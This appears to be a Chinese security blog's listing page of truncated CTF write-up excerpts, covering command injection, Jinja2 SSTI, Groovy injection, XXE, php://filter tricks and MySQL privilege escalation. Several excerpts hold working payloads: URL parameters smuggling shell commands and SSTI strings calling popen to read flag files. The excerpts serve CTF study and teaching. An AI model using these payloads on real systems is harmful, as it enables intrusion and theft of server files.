Web 396-401 url=http://1/1;echo `ls`>a.txturl=http://1/1;echo `cat fl0g.php`>a.txt 具体函数研究可以看过去文章 Web 402 url=file://1/1;echo `cat fl0g.php`>a.txt 简单一看 <?php$url = 'file://1/1;echo `cat fl0…
赛后拿wp来学习分析 主要是一个请求处理的差异 const { FLAG, SECRET } = process.env;const PORT = 3000;const app = express();app.use(express.urlencoded({ extended: true }));const sleep = d => new Promise(r => setTime…
web easyGooGooVVVY 描述 高松灯是一名java安全初学者,最近她在看groovy表达式注入。。。 搜文章去看了groovy表达式注入,没利用成功 可以打反射或者命令注入 def pb = new ProcessBuilder('printenv')def proc = pb.start()proc.waitFor()def stream = proc.getInputStream…
这篇文章受密码保护,输入密码才能阅读
web361 简单测试一遍 ?name={{7*7}} 回显49证明存在SSTI,是jiaji 无过滤直接上payload吧 ?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__["popen"]("cat /flag").read()}} 多写几个payload ?name={{lipsum.__glob…
XXE漏洞概述 XXE:全称为XML Enternal Entity Injection,中文名称:XML外部实体注入 XXE漏洞原理 漏洞成因:解析时未对XML外部实体加以限制,导致攻击者将恶意代码注入到XML中,导致服务器加载恶意的外部实体引发文件读取,SSRF,命令执行等危害操作 特征:在HTTP的Request报文出现一下请求报文,即表明此时是采用XML进行数据传输,就可以测试是否存在XM…
baby layout 下载源码: /index.jsimport express from 'express';import session from 'express-session';import rateLimit from 'express-rate-limit';import { randomBytes } from 'crypto';import createDOMPurify fr…
file_put_contents($filename,”<?php exit();”.$content); 前提就是$filename和$content可控 相对简单来说就是要把<? php exit();给干掉 所以我们要利用php://filter协议可以写入文件 那么原理是什么呢? 通过伪协议把文件当作文本流、非 PHP 代码、压缩文件等其他形式解析,从而避免 PHP 正常解析…
有师傅问到我相关的问题,我也正好来研究一下 首先了解一下 MySQL数据库提权思路 检测数据库存在,探测端口 获得数据库的权限密码 查看数据库类型 其中获取密码是账号密码是关键 其中拿到权限的方法基本就这几种 3306弱口令爆破 sqlmap的-sql-shell模式 网站的数据库配置文件 1day漏洞获取权限 在我自己的理解就是,利用数据库去提权到服务器 简单来说,就是得先有数据库的访问权限才可…
java基础语法 一个java程序可以认为是一系列对象的集合,而对这些对象通过调用彼此的方法来协同工作 对象:对象是类的一个实例,有状态和行为,比如,一条狗是一个对象,他的状态:颜色。名字,品种等,行为有:摇尾巴,叫等 类:类是一个模版,他描述一类对象的行为和状态 方法:方法就是行为,一个类可以有很多方法,逻辑运算,数据修改以及所有动作都是在方法中完成的 实例变量:每一个对象都有独特的实例变量,对…